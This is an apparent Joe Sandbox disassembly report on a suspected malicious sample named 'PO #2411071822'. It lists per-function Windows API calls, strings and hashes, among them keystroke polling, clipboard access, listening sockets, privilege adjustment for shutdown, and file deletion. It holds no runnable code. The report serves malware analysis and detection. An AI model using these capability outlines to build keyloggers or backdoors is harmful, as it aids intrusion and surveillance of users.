                                                                                                              • Opcode ID: 208b8f8af8fd6d5fbfeb61c83a21825e2e6cbc0b4d0486e80f4cb2b8d792284f
                                                                                                              • Instruction ID: 26e8418e2169bb5723a691a7dda2e17d7c2b996a2b29377f759053d36d396ead
                                                                                                              • Opcode Fuzzy Hash: 208b8f8af8fd6d5fbfeb61c83a21825e2e6cbc0b4d0486e80f4cb2b8d792284f
                                                                                                              • Instruction Fuzzy Hash: 8C31D631A006197ACF14AFA1DC49BDF77ACAF4A324F105567F811A31A0EB78EE458A5C
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _memset
                                                                                                              • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                                                                                                              • API String ID: 2102423945-2023335898
                                                                                                              • Opcode ID: 7588d55374c390737bbf741f1adfa50d3d9262a7fa70400db275d03d534f5868
                                                                                                              • Instruction ID: 5af5393bac52822670935677e53f68707ed90b699881bbdb72cf439e09c7c3ab
                                                                                                              • Opcode Fuzzy Hash: 7588d55374c390737bbf741f1adfa50d3d9262a7fa70400db275d03d534f5868
                                                                                                              • Instruction Fuzzy Hash: 7982E271D04269DBCF25CF95C8807EEB7B1BF44310F25826AD819AB381E774AD89CB85
                                                                                                              APIs
                                                                                                              • GetLocalTime.KERNEL32(?), ref: 004309DF
                                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 004309EF
                                                                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 004309FB
                                                                                                              • __wsplitpath.LIBCMT ref: 00430A59
                                                                                                              • _wcscat.LIBCMT ref: 00430A71
                                                                                                              • _wcscat.LIBCMT ref: 00430A83
                                                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00430A98
                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00430AAC
                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00430ADE
                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00430AFF
                                                                                                              • _wcscpy.LIBCMT ref: 00430B0B
                                                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00430B4A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                                              • String ID: *.*
                                                                                                              • API String ID: 3566783562-438819550
                                                                                                              • Opcode ID: 9a5955a4829b76f46caefe5f089bc48272cab0a93a7c76f75827e4f58549b05a
                                                                                                              • Instruction ID: 9735b3f765de1dfb7aa6946eaacf1e0523efd89e9a93503a0e6ba4a8064b0227
                                                                                                              • Opcode Fuzzy Hash: 9a5955a4829b76f46caefe5f089bc48272cab0a93a7c76f75827e4f58549b05a
                                                                                                              • Instruction Fuzzy Hash: B06159B25042059FD710EF61C850AAFB3E8FF89314F044A2EF98997251EB39E945CB96
                                                                                                              APIs
                                                                                                                • Part of subcall function 0041ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0041ABD7
                                                                                                                • Part of subcall function 0041ABBB: GetLastError.KERNEL32(?,0041A69F,?,?,?), ref: 0041ABE1
                                                                                                                • Part of subcall function 0041ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0041A69F,?,?,?), ref: 0041ABF0
                                                                                                                • Part of subcall function 0041ABBB: HeapAlloc.KERNEL32(00000000,?,0041A69F,?,?,?), ref: 0041ABF7
                                                                                                                • Part of subcall function 0041ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0041AC0E
                                                                                                                • Part of subcall function 0041AC56: GetProcessHeap.KERNEL32(00000008,0041A6B5,00000000,00000000,?,0041A6B5,?), ref: 0041AC62
                                                                                                                • Part of subcall function 0041AC56: HeapAlloc.KERNEL32(00000000,?,0041A6B5,?), ref: 0041AC69
                                                                                                                • Part of subcall function 0041AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0041A6B5,?), ref: 0041AC7A
                                                                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0041A6D0
                                                                                                              • _memset.LIBCMT ref: 0041A6E5
                                                                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0041A704
                                                                                                              • GetLengthSid.ADVAPI32(?), ref: 0041A715
                                                                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 0041A752
                                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0041A76E
                                                                                                              • GetLengthSid.ADVAPI32(?), ref: 0041A78B
                                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0041A79A
                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0041A7A1
                                                                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0041A7C2
                                                                                                              • CopySid.ADVAPI32(00000000), ref: 0041A7C9
                                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0041A7FA
                                                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0041A820
                                                                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0041A834
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                              • String ID:
                                                                                                              • API String ID: 3996160137-0
                                                                                                              • Opcode ID: 88dda771fa4c2536434b8012cd65cf2af0ad7dd34057a42c332e27993482da41
                                                                                                              • Instruction ID: 68c6b8ce17194c3d73c326b21fc1ad7abf1ae9aa5e8cb316df5eb164d17c70fa
                                                                                                              • Opcode Fuzzy Hash: 88dda771fa4c2536434b8012cd65cf2af0ad7dd34057a42c332e27993482da41
                                                                                                              • Instruction Fuzzy Hash: 6D515C71E01209ABDF009F91DC44AEFBBB9FF04314F04812AE911A6291E778DA56CB69
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: H$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$HHH H
                                                                                                              • API String ID: 0-2359093945
                                                                                                              • Opcode ID: 7f51216112ea3fa48274f4dfe249890935c95ca04b786d36d30d765a367f12c6
                                                                                                              • Instruction ID: 3a29c6093308e7e21ce5d891f8287f3990c49aad5c9c542e8fa23a2a6b0f077c
                                                                                                              • Opcode Fuzzy Hash: 7f51216112ea3fa48274f4dfe249890935c95ca04b786d36d30d765a367f12c6
                                                                                                              • Instruction Fuzzy Hash: BC728E71E042699BDF25CF59C8807AEB7B5BF48310F14816BE809EB2C0EB749E41DB95
                                                                                                              APIs
                                                                                                                • Part of subcall function 00426EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00425FA6,?), ref: 00426ED8
                                                                                                                • Part of subcall function 004272CB: GetFileAttributesW.KERNEL32(?,00426019), ref: 004272CC
                                                                                                              • _wcscat.LIBCMT ref: 00426441
                                                                                                              • __wsplitpath.LIBCMT ref: 0042645F
                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00426474
                                                                                                              • _wcscpy.LIBCMT ref: 004264A3
                                                                                                              • _wcscat.LIBCMT ref: 004264B8
                                                                                                              • _wcscat.LIBCMT ref: 004264CA
                                                                                                              • DeleteFileW.KERNEL32(?), ref: 004264DA
                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 004264EB
                                                                                                              • FindClose.KERNEL32(00000000), ref: 00426506
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                                                              • String ID: \*.*
                                                                                                              • API String ID: 2643075503-1173974218
                                                                                                              • Opcode ID: 1bfee344242286bf20c92628bbf17f5383b325c95981145e23caa0fc3bcbfdf6
                                                                                                              • Instruction ID: 4b7243bd86be8852219a7948602e11938d0fb3edd44910dbfc1f28bf8b3271f5
                                                                                                              • Opcode Fuzzy Hash: 1bfee344242286bf20c92628bbf17f5383b325c95981145e23caa0fc3bcbfdf6
                                                                                                              • Instruction Fuzzy Hash: 3731A2B2908384AAC721EFA49885ADB77DCAF56304F40092FF5D9C3141EA39D549876B
APIs
  • Part of subcall function 00443C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00442BB5,?,?), ref: 00443C1D
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0044328E
  • Part of subcall function 003E936C: __swprintf.LIBCMT ref: 003E93AB
  • Part of subcall function 003E936C: __itow.LIBCMT ref: 003E93DF
• RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0044332D
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 004433C5
• RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00443604
• RegCloseKey.ADVAPI32(00000000), ref: 00443611
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
• String ID:
• API String ID: 1240663315-0
APIs
• GetKeyboardState.USER32(?), ref: 00422B5F
• GetAsyncKeyState.USER32(000000A0), ref: 00422BE0
• GetKeyState.USER32(000000A0), ref: 00422BFB
• GetAsyncKeyState.USER32(000000A1), ref: 00422C15
• GetKeyState.USER32(000000A1), ref: 00422C2A
• GetAsyncKeyState.USER32(00000011), ref: 00422C42
• GetKeyState.USER32(00000011), ref: 00422C54
• GetAsyncKeyState.USER32(00000012), ref: 00422C6C
• GetKeyState.USER32(00000012), ref: 00422C7E
• GetAsyncKeyState.USER32(0000005B), ref: 00422C96
• GetKeyState.USER32(0000005B), ref: 00422CA8
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
APIs
Similarity
• API ID: Clipboard$AllocCloseEmptyGlobalOpen
• String ID:
• API String ID: 1737998785-0
APIs
  • Part of subcall function 00419ABF: CLSIDFromProgID.OLE32 ref: 00419ADC
  • Part of subcall function 00419ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00419AF7
  • Part of subcall function 00419ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00419B05
  • Part of subcall function 00419ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00419B15
• CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0043C235
• _memset.LIBCMT ref: 0043C242
• _memset.LIBCMT ref: 0043C360
• CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0043C38C
• CoTaskMemFree.OLE32(?), ref: 0043C397
Strings
• NULL Pointer assignment, xrefs: 0043C3E5
Similarity
• API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
• String ID: NULL Pointer assignment
• API String ID: 1300414916-2785691316
APIs
  • Part of subcall function 0041B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0041B180
  • Part of subcall function 0041B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0041B1AD
  • Part of subcall function 0041B134: GetLastError.KERNEL32 ref: 0041B1BA
• ExitWindowsEx.USER32(?,00000000), ref: 00427A0F
Strings
Similarity
• API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
• String ID: $@$SeShutdownPrivilege
• API String ID: 2234035333-194228
APIs
• socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00438CA8
• WSAGetLastError.WSOCK32(00000000), ref: 00438CB7
• bind.WSOCK32(00000000,?,00000010), ref: 00438CD3
• listen.WSOCK32(00000000,00000005), ref: 00438CE2
• WSAGetLastError.WSOCK32(00000000), ref: 00438CFC
• closesocket.WSOCK32(00000000,00000000), ref: 00438D10
Similarity
• API ID: ErrorLast$bindclosesocketlistensocket
• String ID:
• API String ID: 1279440585-0
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00426554
• Process32FirstW.KERNEL32(00000000,0000022C), ref: 00426564
• Process32NextW.KERNEL32(00000000,0000022C), ref: 00426583
• __wsplitpath.LIBCMT ref: 004265A7
• _wcscat.LIBCMT ref: 004265BA
• CloseHandle.KERNEL32(00000000,?,00000000), ref: 004265F9
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
• String ID:
• API String ID: 1605983538-0
Strings
Similarity
• API ID:
• String ID: ERCP$VUUU$VUUU$VUUU$VUUU$H
• API String ID: 0-3889504827
                                                                                                              APIs
                                                                                                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 004213DC
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID: lstrlen
                                                                                                              • String ID: ($,2I$<2I$|
                                                                                                              APIs
                                                                                                                • Part of subcall function 0043A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0043A84E
                                                                                                              • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00439296
                                                                                                              • WSAGetLastError.WSOCK32(00000000,00000000), ref: 004392B9
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLastinet_addrsocket
                                                                                                              • String ID:
                                                                                                              APIs
                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0042EB8A
                                                                                                              • _wcscmp.LIBCMT ref: 0042EBBA
                                                                                                              • _wcscmp.LIBCMT ref: 0042EBCF
                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0042EBE0
                                                                                                              • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0042EC0E
                                                                                                              Similarity
                                                                                                              • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                                              • String ID:
                                                                                                              APIs
                                                                                                              Similarity
                                                                                                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                              • String ID:
                                                                                                              APIs
                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,003FE014,75920AE0,003FDEF1,0047DC38,?,?), ref: 003FE02C
                                                                                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 003FE03E
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                              • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID: Exception@8Throwstd::exception::exception
                                                                                                              • String ID: @$ J$ J$ J
                                                                                                              APIs
                                                                                                                • Part of subcall function 003FB34E: GetWindowLongW.USER32(?,000000EB), ref: 003FB35F
                                                                                                              • DefDlgProcW.USER32(?,?,?,?,?), ref: 003FB22F
                                                                                                                • Part of subcall function 003FB55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 003FB5A5
                                                                                                              Similarity
                                                                                                              • API ID: Proc$LongWindow
                                                                                                              • String ID:
                                                                                                              APIs
                                                                                                              • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,004343BF,00000000), ref: 00434FA6
                                                                                                              • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00434FD2
                                                                                                              Similarity
                                                                                                              • API ID: Internet$AvailableDataFileQueryRead
                                                                                                              • String ID:
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID: _memmove
                                                                                                              • String ID: \QI
                                                                                                              • API String ID: 4104443479-910662631
                                                                                                              • Opcode ID: 7a6983fe8b7939cb964c756656ce643175ab36f3a64ac14c6f2901e2849329ce
                                                                                                              • Instruction ID: da7d420321f806c459eafd711e4ffdeab133b960df32fb86c43f1a37e9d683f4
                                                                                                              • Opcode Fuzzy Hash: 7a6983fe8b7939cb964c756656ce643175ab36f3a64ac14c6f2901e2849329ce
                                                                                                              • Instruction Fuzzy Hash: FAA28E74D04269DFCB25CF59C4806ADBBB1FF48310F2582AAE859AB391E7349E81CF45
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0042E20D
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0042E267
• SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0042E2B4
Similarity
• API ID: ErrorMode$DiskFreeSpace
• String ID:
• API String ID: 1682464887-0
• Opcode ID: 60f55c0c87e3a6841f138d2534be703be4a9f2c9ac6a27650d0d278192cfee75
• Instruction ID: 3b740b5674bb1d8c06495429394cc44af8b56e8b36f545c8d4bec15f4da68d88
• Opcode Fuzzy Hash: 60f55c0c87e3a6841f138d2534be703be4a9f2c9ac6a27650d0d278192cfee75
• Instruction Fuzzy Hash: EA216D35A00118EFCB00EFA5D884AEEBBB8FF49314F0584AAE905AB391DB719905CB54
APIs
  • Part of subcall function 003FF4EA: std::exception::exception.LIBCMT ref: 003FF51E
  • Part of subcall function 003FF4EA: __CxxThrowException@8.LIBCMT ref: 003FF533
• LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0041B180
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0041B1AD
• GetLastError.KERNEL32 ref: 0041B1BA
Similarity
• API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
• String ID:
• API String ID: 1922334811-0
• Opcode ID: e9eaa7de5c7b0ce5bede4eefe698085f74f936817d14b5fac1b02fe600947768
• Instruction ID: 0b597e77764c90908d5ac53e287756cfb7395092f6aa314122182ad74b09e116
• Opcode Fuzzy Hash: e9eaa7de5c7b0ce5bede4eefe698085f74f936817d14b5fac1b02fe600947768
• Instruction Fuzzy Hash: 4911BFB1900205BFE7189F64DC85D6BB7ACEF44354B21852EE85A97240EB74FC418A64
APIs
• CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00426623
• DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00426664
• CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0042666F
Similarity
• API ID: CloseControlCreateDeviceFileHandle
• String ID:
• API String ID: 33631002-0
• Opcode ID: d08dd2dabcefc3fcb1c6beafc2d24b59c252e258b43eb5f906d6fe2537f96bf9
• Instruction ID: 0bb6586ea214eda299db8ceb1f34146b2f7aecaa66bf47e80e96d0c40a867051
• Opcode Fuzzy Hash: d08dd2dabcefc3fcb1c6beafc2d24b59c252e258b43eb5f906d6fe2537f96bf9
• Instruction Fuzzy Hash: C9111271E01228BFDB108F99DC45BAFBBBCEB45B10F104166F900E6290D7B45A058BA5
APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00427223
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0042723A
• FreeSid.ADVAPI32(?), ref: 0042724A
Similarity
• API ID: AllocateCheckFreeInitializeMembershipToken
• String ID:
• API String ID: 3429775523-0
• Opcode ID: 7ca47ee7f9443343dde52dc21fb44658c81008c127e471dd80b4e99ab39d42db
• Instruction ID: df5eddc935be5694b990d139a66bbf2ed798a7daa5210542f58f3544cdc00861
• Opcode Fuzzy Hash: 7ca47ee7f9443343dde52dc21fb44658c81008c127e471dd80b4e99ab39d42db
• Instruction Fuzzy Hash: 23F01D76F04209FFDF04DFE4DD99AEEBBB8EF08205F504469E602E2191E2749A448B15
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 0042F599
• FindClose.KERNEL32(00000000), ref: 0042F5C9
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
• Opcode ID: a7d32eda4f55f7840694330255f965f6df1ebfe3adb1adba1a0d8f8cb12a253a
• Instruction ID: f1e835a66e762dfac59587b2f03bbabc14d2b65bca859e23ff36534f688696a9
• Opcode Fuzzy Hash: a7d32eda4f55f7840694330255f965f6df1ebfe3adb1adba1a0d8f8cb12a253a
• Instruction Fuzzy Hash: AD11C4316006149FD710EF29D845A2EB3E8FF85324F41892EF9A5DB3D1DB74AD058B85
APIs
• GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0043BE6A,?,?,00000000,?), ref: 0042CEA7
• FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0043BE6A,?,?,00000000,?), ref: 0042CEB9
Similarity
• API ID: ErrorFormatLastMessage
• String ID:
• API String ID: 3479602957-0
• Opcode ID: 95e1bf61c3f5532f49ef1e866d949fe787335748460394e639b61e0fba56d7f8
• Instruction ID: 5ea4b36e52492ee59654223f58f4156c553c8f2f6e3adc2ffe15b9fe1d3cb6c5
• Opcode Fuzzy Hash: 95e1bf61c3f5532f49ef1e866d949fe787335748460394e639b61e0fba56d7f8
• Instruction Fuzzy Hash: D6F08231600239ABDB20ABA5DC89FEE776DBF08351F008166F919D6181D7749A44CBA5
APIs
• SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00424153
• keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 00424166
Similarity
• API ID: InputSendkeybd_event
• String ID:
• API String ID: 3536248340-0
• Opcode ID: df6e5c87e6064cafd80c7803b474057d137cc0ae16f76277ff5a4ab46b8141ea
• Instruction ID: afac286a4dcff201d6af75bbb8cb8f0b569aa303320b61e4bd4244a84f983fe8
• Opcode Fuzzy Hash: df6e5c87e6064cafd80c7803b474057d137cc0ae16f76277ff5a4ab46b8141ea
• Instruction Fuzzy Hash: 50F06D7090024DAFDB058FA0C809BBE7BB0EF04305F00801AF96696191D7B986129FA9
APIs
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0041ACC0), ref: 0041AB99
• CloseHandle.KERNEL32(?,?,0041ACC0), ref: 0041ABAB
Similarity
• API ID: AdjustCloseHandlePrivilegesToken
• String ID:
• API String ID: 81990902-0
• Opcode ID: 960593f57473e6f5039bf24dc3711059173615b670d5c200f6b73a98e18e8712
• Instruction ID: 4eab5c25359001bc37a2b5e10e8784dc1016e3299e2e213180da35add93036e8
• Opcode Fuzzy Hash: 960593f57473e6f5039bf24dc3711059173615b670d5c200f6b73a98e18e8712
• Instruction Fuzzy Hash: A8E08631400510AFE7222F14EC04D7377E9EF003207108439F95D80430D7626CD0DB50
APIs
• SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00406DB3,-0000031A,?,?,00000001), ref: 004081B1
• UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 004081BA
                                                                                                              Similarity
                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                              • String ID:
                                                                                                              • API String ID: 3192549508-0
                                                                                                              • Opcode ID: c14e6fccb7338cc0d4ca3dd942bedcef60ee94bc9162481c82c5a1853773e743
                                                                                                              • Instruction ID: 140bf008e09df41ea61ac41b16eb64d89e6194adce157672ffd6d1935c81102b
                                                                                                              • Opcode Fuzzy Hash: c14e6fccb7338cc0d4ca3dd942bedcef60ee94bc9162481c82c5a1853773e743
                                                                                                              • Instruction Fuzzy Hash: 70B09231A44608ABDB002BA2EC09B587F68EB08652F004030FA0D44261ABB254908A9B
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: BuffCharUpper
                                                                                                              • String ID: J
                                                                                                              • API String ID: 3964851224-3887863984
                                                                                                              • Opcode ID: 41e229388b511012688d0d724aed57131f13e5891981328e446e99b1c4dba3e3
                                                                                                              • Instruction ID: f152ca6a6a0b4bdbf491c04471eedb32ff655715ba6ae36efa46a3a05d85028c
                                                                                                              • Opcode Fuzzy Hash: 41e229388b511012688d0d724aed57131f13e5891981328e446e99b1c4dba3e3
                                                                                                              • Instruction Fuzzy Hash: 4692AB70608345DFD725DF19C490B2AB7E4BF88304F14885EEA8A8B3A2D775ED49CB52
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
